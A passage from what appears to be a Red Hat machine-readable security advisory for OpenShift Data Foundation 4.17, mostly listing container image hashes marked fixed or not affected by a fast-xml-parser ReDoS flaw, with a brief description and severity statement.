"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2300499", }, ], notes: [ { category: "description", text: "A regular expression denial of service (ReDoS) flaw was found in fast-xml-parser in the currency.js script. By sending a specially crafted regex input, a remote attacker could cause a denial of service condition.", title: "Vulnerability description", }, { category: "summary", text: "fast-xml-parser: ReDOS at currency parsing in currency.js", title: "Vulnerability summary", }, { category: "other", text: "Red Hat has decided to rate this vulnerability as Important due to the potential loss of Availability and the low complexity.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", 